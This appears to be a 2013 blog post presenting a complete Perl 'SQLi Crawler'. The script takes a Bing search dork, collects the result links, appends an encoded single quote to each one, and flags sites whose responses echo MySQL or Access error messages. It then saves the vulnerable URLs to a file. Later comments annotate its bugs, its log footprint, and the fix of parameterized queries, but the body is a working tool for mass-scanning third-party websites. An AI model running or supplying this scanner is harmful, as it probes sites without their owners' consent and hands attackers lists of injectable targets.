Friday, 18 January 2013

Perl SQLi Crawler



#!/usr/bin/perl

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

###############
# File-scoped scratch variables. sql_scan() takes no arguments and returns
# nothing; the menu code and the sub communicate only through these lexicals.
my $dork;
my $url;
my $i;
my $request;
my $useragent;
my $response;
my $start;
my $end;
my $result;
my $fl;
my $link;
my $req;
my $ua;
my $result2;
my $res;
my $save;
my $pages;
my $page;
my $choice;
##############
# Every URL flagged by sql_scan() is pushed here. Nothing ever empties the
# array, so entries from an earlier scan are still present on the next one.
my @z;

# Startup banner. It sits before the MainMenu label, so it is printed once
# and not repeated when sql_scan() jumps back to the menu.
print q{
     _ ____        _  
    | |  _ \      | | 
  __| | |_) | ___ | |_
 / _` |  _ < / _ \| __|
| (_| | |_) | (_) | |_
 \__,_|____/ \___/ \__|
                          
################################
##      / SQLi Crawler /      ##
##      Private Edition       ##
##      ~Coded by dbx~        ##
################################

};

# Target of the `goto MainMenu` at the end of sql_scan().
MainMenu:

print "------------------------\n";
print "Enter [1] To Begin SQLi.\n";
print "Enter [2] To Exit.\n";
print "------------------------\n\n";
print "Your Choice: ";

# Read one line from the operator; no validation is done on the value.
chomp ($choice = <STDIN>);
print "\n";

# `&sql_scan` with no parentheses calls the sub with the caller's current @_.
if ($choice eq 1) {&sql_scan}
# NOTE(review): the menu advertises [2] for exit but this tests for 5.
# Neither `if` matches any other input, and on this page only the sub
# definition follows, so such input appears to end the program by falling
# off the end rather than through this `die`.
if ($choice eq 5) {die;}

# sql_scan: prompts for a search query and a page count, fetches search-result
# pages, requests each result link with "%27" (a URL-encoded single quote)
# appended, and classifies the link by whether database error text appears in
# the response body. Flagged links are pushed onto the file-scoped @z, printed,
# and optionally appended to Vulns.txt. Takes no arguments, returns nothing,
# and leaves via `goto MainMenu` instead of returning.
#
# What this traffic looks like from the receiving side: both LWP::UserAgent
# objects below are created with no options, so requests carry LWP's default
# "libwww-perl/<version>" User-Agent, and each probed URL is an otherwise
# ordinary link with a trailing %27. Those two properties together are what
# a web-server or WAF log would show for this script.
sub sql_scan
{

print "[+] Enter Bing! dork: ";
chomp ($dork = <STDIN>);
print "\n";
print "[+] How Many Pages To Leech?: ";
chomp ($pages = <STDIN>);
print "\n";

# String concatenation, not arithmetic: an input of 3 yields "31". The input
# is never checked to be numeric before it is used as the loop bound below.
$page = $pages.'1';

print "[~] Crawling...\n\n";

# $i is sent as the `first=` result offset and advances by 11 per request.
for ($i = 0; $i <= $page; $i=$i+11)
{

# $dork is interpolated into the query string as typed, without URL-escaping.
$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
# The response status is never checked; whatever body came back is parsed.
$result = $response->content;

# Literal markers expected on either side of each result link in the HTML.
# Link extraction depends on the page markup matching these strings exactly.
$start = '<h3><a href="';
$end = '" onmousedown=';

while ($result =~ m/$start(.*?)$end/g)

{
     # $1 is the href captured between the two markers.
     $fl = $1;
     # Append an encoded single quote to the link and fetch the result.
     $link = $fl."%27";
     $req = HTTP::Request->new(GET => $link);
     $ua = LWP::UserAgent->new();
     $res = $ua->request($req);
     $result2 = $res->content;

      # Classification is purely a search for database error text echoed in
      # the body. These are the messages an application leaks when raw driver
      # or query errors reach the client. Returning a generic error page
      # removes this signal, but only parameterized queries fix the
      # underlying query construction.
      # The mysql_fetch_array test is redundant: mysql_fetch_ already matches it.
      if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
      {
          push @z, $link;
          print "[+] MySQL Vulnerable: $link\n\n";
      }

      # NOTE(review): the strings matched here name the Microsoft JET engine
      # and the Access ODBC driver, yet the message labels the hit "MsSQL".
      elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
      {
          push @z, $link;
          print "[+] MsSQL Vulnerable: $link\n\n";
      }

      # Reached when none of the error strings matched. That only means no
      # error text was observed; it is not evidence that the application
      # handles the input safely.
      else {
         
              print "[-] $link <- Not Vulnerable\n\n";
      }
}

}
    # @z is file-scoped and never cleared, so this list (and the file written
    # below) also contains links flagged by earlier scans in the same run.
    print "Vulnerable Links:\n";
    print "-----------------------------------\n";
foreach (@z)
{
    print "$_ \n\n";
}
print "Save Into A Text File? (Y or N): ";
chomp ($save = <STDIN>);

# Only an exact uppercase 'Y' saves; any other answer skips the block.
if ($save eq 'Y')
{
    print "Saving File...\n\n";
    # Two-argument open on a bareword handle, append mode, in the current
    # working directory. The return value is not checked, so "File Saved!"
    # is printed even if the open or the writes failed.
    open(vuln_file, ">>Vulns.txt");
    foreach (@z)
    {
        print vuln_file "$_ \n";
    }
    close(vuln_file);
    print "File Saved!\n\n";
}
# Jumps out of the sub to the MainMenu label instead of returning.
goto MainMenu;
}
